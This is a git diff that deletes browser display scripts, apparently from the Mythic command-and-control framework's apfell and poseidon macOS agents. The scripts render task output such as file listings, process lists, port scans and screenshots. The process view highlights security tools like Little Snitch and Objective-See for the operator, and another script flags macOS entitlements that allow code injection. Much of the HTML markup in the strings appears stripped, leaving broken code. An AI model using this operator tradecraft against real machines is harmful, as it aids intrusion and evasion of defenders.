"; - } - } - return support_scripts['apfell_create_table']([{"name":"pid","size":"2em"},{"name":"arch","size":"2em"},{"name":"name", "size":"10em"}, {"name":"frontMost","size":"3em"},{"name":"bin_path","size":"20em"}], rows); -} diff --git a/Payload_Types/apfell/mythic/browser_scripts/ls.js b/Payload_Types/apfell/mythic/browser_scripts/ls.js deleted file mode 100644 index 5e8216ea8..000000000 --- a/Payload_Types/apfell/mythic/browser_scripts/ls.js +++ /dev/null @@ -1,52 +0,0 @@ -function(task, responses){ - if(task.status === 'error'){ - return "
 Error: untoggle for error message(s) 
"; - }else if(responses[0]['response'] === "added data to file browser"){ - return "
added data to file browser
"; - } - let rows = []; - try{ - for(let i = 0; i < responses.length; i++){ - let data = JSON.parse(responses[i]['response']); - let row_style = ""; - if( !data['is_file'] ){ row_style = "background-color: #5E28DC"} - let row = {"name": escapeHTML(data['name']), "size": escapeHTML(data['size']), "row-style": row_style, "cell-style": {}}; - let perm_data = data['permissions']; - let xattr = []; - for(const [key, value] of Object.entries(perm_data)){ - if(key === "owner"){row['owner'] = escapeHTML(value);} - else if(key === "group"){row['group'] = escapeHTML(value);} - else if(key === "posix"){row['posix'] = escapeHTML(value);} - else if(key.includes(".")){xattr.push(escapeHTML(key))} - } - row['xattr'] = xattr.join("
"); - rows.push(row); - if(!data.hasOwnProperty('files')){data['files'] = []} - data['files'].forEach(function(r){ - let row_style = ""; - if( !r['is_file'] ){ row_style = "background-color: #5E28DC"} - let row = {"name": escapeHTML(r['name']), "size": escapeHTML(r['size']), "row-style": row_style, "cell-style": {}}; - let perm_data = r['permissions']; - let xattr = []; - for(const [key, value] of Object.entries(perm_data)){ - if(key === "owner"){row['owner'] = escapeHTML(value);} - else if(key === "group"){row['group'] = escapeHTML(value);} - else if(key === "posix"){row['posix'] = escapeHTML(value);} - else if(key.includes(".")){xattr.push(escapeHTML(key))} - } - row['xattr'] = xattr.join("
"); - rows.push(row); - }); - } - return support_scripts['apfell_create_table']([ - {"name":"name", "size":"10em"}, - {"name":"size", "size":"2em"}, - {"name":"owner","size":"3em"}, - {"name":"group", "size": "2em"}, - {"name":"posix", "size":"2em"}, - {"name":"xattr", "size": "1em"}], rows); - }catch(error){ - console.log(error); - return "
 Error: untoggle for error message(s) 
"; - } -} \ No newline at end of file diff --git a/Payload_Types/apfell/mythic/browser_scripts/screenshot.js b/Payload_Types/apfell/mythic/browser_scripts/screenshot.js deleted file mode 100644 index 83854817f..000000000 --- a/Payload_Types/apfell/mythic/browser_scripts/screenshot.js +++ /dev/null @@ -1,20 +0,0 @@ -function(task, responses){ - if(task.status === 'error'){ - return "
 Error: Untoggle switch to see error message(s) 
"; - } - if(task.completed){ - try{ - let status = JSON.parse(responses[0]['response']); - let id = status['agent_file_id']; - let output = "
"; - output += "
"; - output += "
" + element + "
"; - return output; -} \ No newline at end of file diff --git a/Payload_Types/poseidon/mythic/browser_scripts/create_process_additional_info_modal.js b/Payload_Types/poseidon/mythic/browser_scripts/create_process_additional_info_modal.js deleted file mode 100644 index ad5bfac65..000000000 --- a/Payload_Types/poseidon/mythic/browser_scripts/create_process_additional_info_modal.js +++ /dev/null @@ -1,20 +0,0 @@ -function(uniqueName){ - let html = ` - - -`; - return html; -} \ No newline at end of file diff --git a/Payload_Types/poseidon/mythic/browser_scripts/create_table.js b/Payload_Types/poseidon/mythic/browser_scripts/create_table.js deleted file mode 100644 index 46191f464..000000000 --- a/Payload_Types/poseidon/mythic/browser_scripts/create_table.js +++ /dev/null @@ -1,22 +0,0 @@ -function(headers, data){ - let output = ""; - output += ""; - for(let i = 0; i < headers.length; i++){ - output += ""; - } - output += ""; - for(let i = 0; i < data.length; i++){ - output += ""; - for(let j = 0; j < headers.length; j++){ - if(data[i]['cell-style'].hasOwnProperty(headers[j])){ - output += ""; - } - else{ - output += ""; - } - } - output += ""; - } - output += "
" + headers[i]['name'].toUpperCase() + "
" + data[i][headers[j]['name']] + "" + data[i][headers[j]['name']] + "
"; - return output; -} \ No newline at end of file diff --git a/Payload_Types/poseidon/mythic/browser_scripts/download.js b/Payload_Types/poseidon/mythic/browser_scripts/download.js deleted file mode 100644 index 87a876bb7..000000000 --- a/Payload_Types/poseidon/mythic/browser_scripts/download.js +++ /dev/null @@ -1 +0,0 @@ -function(task, responses){ if(responses.length === 2){ try{ var status = JSON.parse(responses[0]['response']); }catch(error){ return JSON.stringify(JSON.parse(responses), null, 2);; } if(status.hasOwnProperty('id')){ return "
Finished Downloading " + escapeHTML(task['params']) + ". Click here to download
"; } } return JSON.stringify(JSON.parse(responses), null, 2); } \ No newline at end of file diff --git a/Payload_Types/poseidon/mythic/browser_scripts/file_size_to_human_readable_string.js b/Payload_Types/poseidon/mythic/browser_scripts/file_size_to_human_readable_string.js deleted file mode 100644 index 763027863..000000000 --- a/Payload_Types/poseidon/mythic/browser_scripts/file_size_to_human_readable_string.js +++ /dev/null @@ -1,14 +0,0 @@ -function(fileSize){ - var thresh = 1024; - if(Math.abs(fileSize) < thresh) { - return fileSize + ' B'; - } - var units = ['KB','MB','GB','TB','PB','EB','ZB','YB']; - var u = -1; - do { - fileSize /= thresh; - ++u; - } while(Math.abs(fileSize) >= thresh && u < units.length - 1); - return fileSize.toFixed(1)+' '+units[u]; - return output; -} \ No newline at end of file diff --git a/Payload_Types/poseidon/mythic/browser_scripts/list_entitlements.js b/Payload_Types/poseidon/mythic/browser_scripts/list_entitlements.js deleted file mode 100644 index a211f1543..000000000 --- a/Payload_Types/poseidon/mythic/browser_scripts/list_entitlements.js +++ /dev/null @@ -1,33 +0,0 @@ -function(task, responses){ - try{ - let ent = JSON.parse(responses[0]['response']); - let interesting = ["com.apple.security.cs.allow-jit", - "com.apple.security.cs.allow-unsigned-executable-memory", - "com.apple.security.cs.allow-dyld-environment-variables", - "com.apple.security.cs.disable-library-validation", - "com.apple.security.cs.disable-executable-page-protection", - "com.apple.security.cs.debugger", "No Entitlements"]; - let dict = {}; - for(let i = 0; i < ent.length; i++){ - if(ent[i]['code_sign'].toString(16).substring(1,2) !== "6"){ - dict[ent[i]['process_id']] = {}; - dict[ent[i]['process_id']]['bin_path'] = ent[i]['bin_path']; - dict[ent[i]['process_id']]['code_sign'] = "0x" + ent[i]['code_sign'].toString(16); - try{ - for(let j = 0; j < interesting.length; j++){ - if(ent[i]['entitlements'].includes(interesting[j])){ - dict[ent[i]['process_id']]['entitlements'] = JSON.parse(ent[i]['entitlements']); - break; - } - } - - }catch(err){ - dict[ent[i]['process_id']]['entitlements'] = ent[i]['entitlements']; - } - } - } - return "
" + escapeHTML(JSON.stringify(dict, null, 6)) + "
"; - }catch(error){ - return "
" + error.toString() + escapeHTML(JSON.stringify(responses, null, 6)) +  "
"; - } -} diff --git a/Payload_Types/poseidon/mythic/browser_scripts/ls.js b/Payload_Types/poseidon/mythic/browser_scripts/ls.js deleted file mode 100644 index 6487e66ee..000000000 --- a/Payload_Types/poseidon/mythic/browser_scripts/ls.js +++ /dev/null @@ -1,36 +0,0 @@ -function(task, responses){ - if(task.status === 'error'){ - return "
 Error: untoggle for error message(s) 
"; - }else if(responses[0]['response'] === "added data to file browser"){ - return "
added data to file browser
"; - } - let rows = []; - try{ - for(let i = 0; i < responses.length; i++){ - let data = JSON.parse(responses[i]['response']); - let row_style = ""; - if( !data['is_file'] ){ row_style = "background-color: #5E28DC"} - let row = {"name": escapeHTML(data['name']), "size": escapeHTML(data['size']), "row-style": row_style, "cell-style": {}}; - let perm_data = data['permissions']; - row['permissions'] = escapeHTML(perm_data["permissions"]); - rows.push(row); - if(!data.hasOwnProperty('files')){data['files'] = []} - data['files'].forEach(function(r){ - let row_style = ""; - if( !r['is_file'] ){ row_style = "background-color: #5E28DC"} - let row = {"name": escapeHTML(r['name']), "size": escapeHTML(r['size']), "row-style": row_style, "cell-style": {}}; - let perm_data = r['permissions']; - perm_data = data['permissions']; - row['permissions'] = escapeHTML(perm_data["permissions"]); - rows.push(row); - }); - } - return support_scripts['poseidon_create_table']([ - {"name":"name", "size":"10em"}, - {"name":"size", "size":"2em"}, - {"name":"permissions","size":"3em"}], rows); - }catch(error){ - console.log(error); - return "
 Error: untoggle for error message(s) 
"; - } -} diff --git a/Payload_Types/poseidon/mythic/browser_scripts/portscan.js b/Payload_Types/poseidon/mythic/browser_scripts/portscan.js deleted file mode 100644 index 9ad2c99bb..000000000 --- a/Payload_Types/poseidon/mythic/browser_scripts/portscan.js +++ /dev/null @@ -1 +0,0 @@ -function(task, response) { const capitalize = (s) => { if (typeof s !== 'string') return '' return s.charAt(0).toUpperCase() + s.slice(1) }; let total_output = ""; let total_results = ""; for (let i = 0; i < response.length; i++) { try { total_results += response[i]["response"]; } catch (error) { return response; } } let data = JSON.parse(total_results); for (let i = 0; i < data.length; i++) { let output = ""; let rows = []; let addedHeader = false; let headerDiv = '
-function(task, response) { const capitalize = (s) => { if (typeof s !== 'string') return ''; return s.charAt(0).toUpperCase() + s.slice(1) }; let total_output = ""; let total_results = ""; for (let i = 0; i < response.length; i++) { try { total_results += response[i]["response"]; } catch (error) { return response; } } let data = JSON.parse(total_results); for (let i = 0; i < data.length; i++) { let output = ""; let rows = []; let addedHeader = false; let headerDiv = '' + escapeHTML(data[i]["range"]) + ''; for (let j = 0; j < data[i]["hosts"].length; j++) { if (data[i]["hosts"][j]["open_ports"] != null) { if (!addedHeader) { output += headerDiv; addedHeader = true; } let host = data[i]["hosts"][j]; rows.push({ "Open Ports": escapeHTML(host["open_ports"].join(", ")), "Host": escapeHTML(host["pretty_name"]), "row-style": "", "cell-style": {} }); } } if (rows.length !== 0) { output += support_scripts['poseidon_create_table']([{ "name": "Open Ports", "size": "1em" }, { "name": "Host", "size": "1em" }], rows); output += ""; total_output += output; } } return total_output; }
\ No newline at end of file
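The deleted portscan.js above concatenates every task response, parses the result as JSON, and renders one table per scanned range, skipping hosts whose open_ports is null. A sketch of the response shape it expects, inferred only from the field names used in the script; the addresses and ports are illustrative:

// Hypothetical agent output that the script above would accept: an array of
// ranges, each listing hosts whose open_ports is either an array or null.
let exampleResponse = JSON.stringify([
    {
        "range": "192.168.1.0/30",
        "hosts": [
            { "pretty_name": "192.168.1.1", "open_ports": [22, 443] },
            { "pretty_name": "192.168.1.2", "open_ports": null }
        ]
    }
]);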
"; total_output += output; } } return total_output; } \ No newline at end of file diff --git a/Payload_Types/poseidon/mythic/browser_scripts/ps.js b/Payload_Types/poseidon/mythic/browser_scripts/ps.js deleted file mode 100644 index 1acec8133..000000000 --- a/Payload_Types/poseidon/mythic/browser_scripts/ps.js +++ /dev/null @@ -1,40 +0,0 @@ -function(task, response){ - let rows = []; - let uniqueName = task.id + "_additional_process_info_modal"; - for(let i = 0; i < response.length; i++){ - try{ - var data = JSON.parse(response[i]['response']); - }catch(error){ - return escapeHTML(response); - } - data.forEach(function(r){ - let row_style = ""; - if(r['name'].includes("Little Snitch")){ - row_style = "background-color:indianred;color:black;"; - }else if(r['bundleid'].includes("objective-see")){ - row_style = "background-color:indianred;color:black;"; - } - let additionalInfo = "
" + escapeHTML(JSON.stringify(r, null, 2)) + '
'; - rows.push({"pid": escapeHTML(r['process_id']), - "ppid": escapeHTML(r['parent_process_id']), - "path": escapeHTML(r['bin_path']), - "user": escapeHTML(r['user']), - "name": escapeHTML(r['name']), - "metadata": ' ', - "row-style": row_style, - "cell-style": {} - }); - }); - } - let output = support_scripts['poseidon_create_process_additional_info_modal'](escapeHTML(uniqueName)); - output += support_scripts['poseidon_create_table']( - [ - {"name":"pid", "size":"3em"}, - {"name":"pid", "size":"3em"}, - {"name": "name", "size": "10rem"}, - {"name": "user", "size": "10em"}, - {"name": "metadata", "size": "5rem"}, - {"name":"path", "size":""} - ], rows); - return output; -} diff --git a/Payload_Types/poseidon/mythic/browser_scripts/screencapture.js b/Payload_Types/poseidon/mythic/browser_scripts/screencapture.js deleted file mode 100644 index cc7aed093..000000000 --- a/Payload_Types/poseidon/mythic/browser_scripts/screencapture.js +++ /dev/null @@ -1,17 +0,0 @@ -function(task, responses){ - if(task.status === 'error'){return "
 Error: Untoggle swtich to see error message(s) 
"; } - let output = ""; - for(let i = 0; i < responses.length; i+=2){ - if( i+1 < responses.length){ - //only want to do this if the next response exists, i.e. file_downloaded - let status = JSON.parse(responses[i]['response']); - let id = status['agent_file_id']; - output += "